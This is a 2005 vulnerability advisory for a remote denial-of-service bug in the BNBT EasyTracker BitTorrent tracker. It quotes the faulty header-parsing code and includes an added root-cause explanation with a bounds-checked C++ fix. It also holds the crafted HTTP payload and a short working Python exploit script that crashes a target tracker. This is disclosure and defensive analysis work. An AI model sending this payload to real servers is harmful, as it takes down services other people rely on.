BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat

Last Update: 2005.08.30

http://secway.org/advisory/AD20050830.txt

Vendor:

http://bnbteasytracker.sourceforge.net/

Product Affected:

7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which
allows an attacker to cause BNBT to stop responding.

Details:

A specially crafted HTTP request will cause the BNBT
server to stop responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, in the "// grab headers" section, and that it is
something like "1-2 = -1", i.e. similar to a memcpy(-1) ?

// grab headers

string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
                                  iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
    string :: size_type iSplit = strTemp.find( ":" );
    string :: size_type iEnd = strTemp.find( "\r\n" );

    if( iSplit == string :: npos )
    {
        UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

        break;
    }

    string strKey = strTemp.substr( 0, iSplit );
    string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( "\r\n" ) ); //Bug here ??

    rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

    strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

    if( iEnd == string :: npos )
        break;
}

However, I am not quite sure about that, and it seems that
it is only a D.O.S, so I haven't dug deep into it.

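The advisory leaves the root cause open. Reading only the snippet quoted above: for the crafted request, strTemp is the single byte ":", so iSplit is 0 and iEnd is string::npos, and the value extraction becomes strTemp.substr( 2, ... ) on a one-byte string. std::string::substr throws std::out_of_range when its start offset exceeds the string length, and an exception nobody catches terminates the process, which would match "stops responding". The example below is added here and is not BNBT's code; it assumes the quoted snippet is what the tracker actually ran. It transcribes the quoted loop as a function so the failure can be observed under try/catch, and places a bounds-checked rewrite beside it. The function names (grabHeadersAsQuoted, grabHeadersChecked, checkedHeaderValue) and the sample requests are my own.

```cpp
// Added example: the quoted "grab headers" loop as a function, beside a
// bounds-checked rewrite. Not BNBT's own code; names and inputs are constructed.
#include <cstring>
#include <iostream>
#include <map>
#include <stdexcept>
#include <string>
#include <utility>

using namespace std;

typedef map<string, string> HeaderMap;

// Transcription of the quoted loop: same arithmetic, same substr calls. With a
// header block of just ":" it calls strTemp.substr( 2, ... ) on a one-byte
// string, and std::string reports that by throwing std::out_of_range.
bool grabHeadersAsQuoted( const string &m_strReceiveBuf, HeaderMap &mapHeaders )
{
    string::size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
    string::size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

    string strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
                                             iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
    while( 1 )
    {
        string::size_type iSplit = strTemp.find( ":" );
        string::size_type iEnd = strTemp.find( "\r\n" );

        if( iSplit == string::npos )
            return false;                   // the "malformed HTTP request (bad header)" path

        string strKey = strTemp.substr( 0, iSplit );
        string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( "\r\n" ) );

        mapHeaders.insert( pair<string, string>( strKey, strValue ) );
        strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

        if( iEnd == string::npos )
            break;
    }
    return true;
}

// True if the quoted loop throws on this request. Uncaught in a server loop,
// that exception is one plausible way the tracker "stops responding".
bool requestCrashesQuotedLoop( const string &request )
{
    HeaderMap ignored;
    try { grabHeadersAsQuoted( request, ignored ); return false; }
    catch( const out_of_range & ) { return true; }
}

// Bounds-checked rewrite: every offset is validated before it reaches substr,
// a header with an empty name is rejected instead of indexed past the end, and
// the space after the colon is optional rather than assumed.
bool grabHeadersChecked( const string &buf, HeaderMap &out )
{
    string::size_type iNewLine = buf.find( "\r\n" );
    string::size_type iDoubleNewLine = buf.find( "\r\n\r\n" );
    if( iNewLine == string::npos || iDoubleNewLine == string::npos || iDoubleNewLine < iNewLine )
        return false;                       // incomplete request: wait for more data

    string::size_type pos = iNewLine + 2;
    while( pos < iDoubleNewLine )
    {
        string::size_type iEnd = buf.find( "\r\n", pos );
        if( iEnd == string::npos || iEnd > iDoubleNewLine )
            iEnd = iDoubleNewLine;

        string line = buf.substr( pos, iEnd - pos );
        pos = iEnd + 2;

        string::size_type iSplit = line.find( ':' );
        if( iSplit == string::npos || iSplit == 0 )
            return false;                   // no header name: reject, do not guess

        string::size_type vstart = iSplit + 1;
        while( vstart < line.size() && line[vstart] == ' ' )
            ++vstart;

        out.insert( make_pair( line.substr( 0, iSplit ), line.substr( vstart ) ) );
    }
    return true;
}

// One header from the hardened parser; "" if the request was rejected or the
// header is absent.
string checkedHeaderValue( const string &request, const string &name )
{
    HeaderMap h;
    if( !grabHeadersChecked( request, h ) )
        return "";
    HeaderMap::const_iterator it = h.find( name );
    return it == h.end() ? "" : it->second;
}

int main()
{
    // Constructed inputs: the request from the advisory and an ordinary one.
    const string crafted = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n";
    const string normal = "GET / HTTP/1.1\r\nHost: x\r\nUser-Agent: y\r\n\r\n";
    cout << "quoted loop throws on crafted request: " << requestCrashesQuotedLoop( crafted ) << endl;
    cout << "quoted loop throws on normal request:  " << requestCrashesQuotedLoop( normal ) << endl;
    cout << "checked parser rejects crafted request: " << checkedHeaderValue( crafted, "Host" ).empty() << endl;
    cout << "checked parser Host value: " << checkedHeaderValue( normal, "Host" ) << endl;
    return 0;
}
```

The checked version also changes the control flow in a way worth noting: a header line the parser cannot name makes it refuse the whole request (so the caller can log and close the connection), rather than trusting whatever substr happens to return; and it never derives a length from npos, which is where the quoted loop's "1-2 = -1" style arithmetic comes from.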
Exploit:

#BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) != 2):
    print "\nUsage: " + sys.argv[0] + " TargetIP\n"
    print "##################################################################"
    print "#                                                                #"
    print "#              BNBT EasyTracker Remote D.O.S Exploit             #"
    print "#               Bug discoverd and coded by Sowhat                #"
    print "#                      http://secway.org                         #"
    print "##################################################################"
    sys.exit(0)

host = sys.argv[1]
port = 6969

payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)


WORKAROUND:

No workaround this time.
Please check the vendor's website for an update.
Maybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via web form, no email address found
2005.08.30 No response from vendor. Advisory released

"Life is like a bug, Do you know how to exploit it ?"
